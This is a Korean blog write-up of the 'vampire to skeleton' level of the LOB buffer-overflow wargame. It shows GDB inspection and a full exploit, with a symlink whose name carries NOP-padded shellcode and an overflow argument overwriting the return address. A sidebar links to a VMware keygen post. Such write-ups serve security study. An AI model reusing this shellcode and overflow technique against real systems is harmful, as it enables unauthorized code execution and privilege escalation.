ANX1-Z3R0의 불안극복(不安克服)

011. vampire to skeleton | anxi0 본문

HACKING/[SYSTEM HACKING] LOB

011. vampire to skeleton | anxi0

ANX1Z3R0 2019. 3. 21. 14:55

vampire을 땄다!


skeleton도 따보자.


울트라 알그브 헌터?

굉장히 위협적이게 생겼다. 

argv영역을 초기화 시킨다.

와;; 큰일 났네 쉘코드 어따가 넣냐,

막막하다면, GDB로 까봐야지

<- mkdir tmp

<-cd tmp

<-cp ~/skeleton skeleton

<-gdb -q skeleton

<-set disassembly-flavor intel

<-disas main

엥.........별게 없는데....?


안돼겠다. esp부터 스트링으로 까보자

 <- r `python -c 'print "\xbf"*48'`

<- x/1000s $esp 

계속 내려봤는데...........

역시! 뭔가 여지를 줬구만

이름에 쉘코드 넣으면 되겠네~


원본 파일 이름 바꾸는 건 위험하니깐... 심볼릭 링크?

<- ln -sf skeleton `python -c 'print "\x90"*50 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81" + "\x90"*50'` 

(앞뒤로 nop을 넣어줘야 한다.)

그 다음 실행! 

<- ./`python -c 'print "\x90"*50 + "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81" + "\x90"*50'`  `python -c 'print "\x90"*44 + "\x8d\xff\xff\xbf"'`


쉘 떠진다! exit하고 본 파일에다가 익스하자.

휘유 ㅜㅜㅜ 이거푸는데 쉘코드 때문에 3일동안 잡고 있었다 ㅜㅜ


교훈

1. 명령어를 잘 활용하자 (리눅스를 익혀놓자)

2. 걍 파일보고 답 안나오면 gdb로 까보자!

3. 쉘코드에 주의하자 ㅜㅜㅜ

'HACKING > [SYSTEM HACKING] LOB' 카테고리의 다른 글

VMware 15.5 pro keygen 설치 방법  (0) 2020.07.11
012. skeleton to golem | anxi0  (0) 2019.04.03
010. troll to vampire | anxi0  (0) 2019.02.19
009. orge to troll | anxi0  (0) 2019.02.19
008. darkelf to orge | anxi0  (0) 2019.02.18
Comments